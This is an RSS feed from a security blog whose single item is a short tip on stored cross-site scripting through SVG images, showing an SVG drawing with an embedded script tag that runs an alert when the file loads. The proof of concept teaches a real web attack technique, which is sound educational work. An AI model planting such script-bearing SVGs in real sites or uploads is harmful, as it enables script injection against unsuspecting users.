<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<rss version="2.0" 
  xmlns:content="http://purl.org/rss/1.0/modules/content/" 
  xmlns:dc="http://purl.org/dc/elements/1.1/" 
  xmlns:atom="http://www.w3.org/2005/Atom" 
  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
  xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>minitips on Sam&#39;s Hacking Wonderland</title>
    <link>https://netsec.expert/categories/minitips/</link>
    <description>Recent content in minitips on Sam&#39;s Hacking Wonderland</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en</language>
    <managingEditor>the@netsec.expert (Sam Anttila)</managingEditor>
    <webMaster>the@netsec.expert (Sam Anttila)</webMaster>
    <copyright>&amp;copy;{year}</copyright>
    <lastBuildDate>Thu, 09 Jan 2020 12:00:00 +0000</lastBuildDate>
    <sy:updatePeriod>weekly</sy:updatePeriod>
    
        <atom:link href="https://netsec.expert/categories/minitips/index.xml" rel="self" type="application/rss+xml" />
    

      
      <item>
        <title>Minitip - Stored XSS through SVG</title>
        <link>https://netsec.expert/posts/xss-through-svg/</link>
        <pubDate>Thu, 09 Jan 2020 12:00:00 +0000</pubDate>
        <author>the@netsec.expert (Sam Anttila)</author>
        <atom:modified>Thu, 09 Jan 2020 12:00:00 +0000</atom:modified>
        <guid>https://netsec.expert/posts/xss-through-svg/</guid>
        <description>The button below will write the following SVG image to the page (remember: SVG files are just code):

alert(&amp;quot;XSS through SVG&amp;quot;); &amp;quot;&#39;);&#34;Load SVG file
1 2 3 4 5 6 7  &amp;lt;svg xmlns=&amp;#34;http://www.w3.org/2000/svg&amp;#34; viewBox=&amp;#34;0 0 100 100&amp;#34;&amp;gt; &amp;lt;circle cx=&amp;#34;50&amp;#34; cy=&amp;#34;50&amp;#34; r=&amp;#34;48&amp;#34; fill=&amp;#34;none&amp;#34; stroke=&amp;#34;#000&amp;#34;/&amp;gt; &amp;lt;path d=&amp;#34;M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48&amp;#34;/&amp;gt; &amp;lt;circle cx=&amp;#34;50&amp;#34; cy=&amp;#34;26&amp;#34; r=&amp;#34;6&amp;#34;/&amp;gt; &amp;lt;circle cx=&amp;#34;50&amp;#34; cy=&amp;#34;74&amp;#34; r=&amp;#34;6&amp;#34; fill=&amp;#34;#FFF&amp;#34;/&amp;gt; ***&amp;lt;script&amp;gt;alert(&amp;#34;XSS through SVG&amp;#34;);&amp;lt;/script&amp;gt;*** &amp;lt;/svg&amp;gt;    Which when loaded will trigger the XSS payload marked above.</description>
        
        <dc:creator>Sam Anttila</dc:creator>
        
        
        
        
        
          
            
              <category>minitips</category>
            
          
            
              <category>vulnerabilities</category>
            
          
        
        
      </item>
      

    
  </channel>
</rss>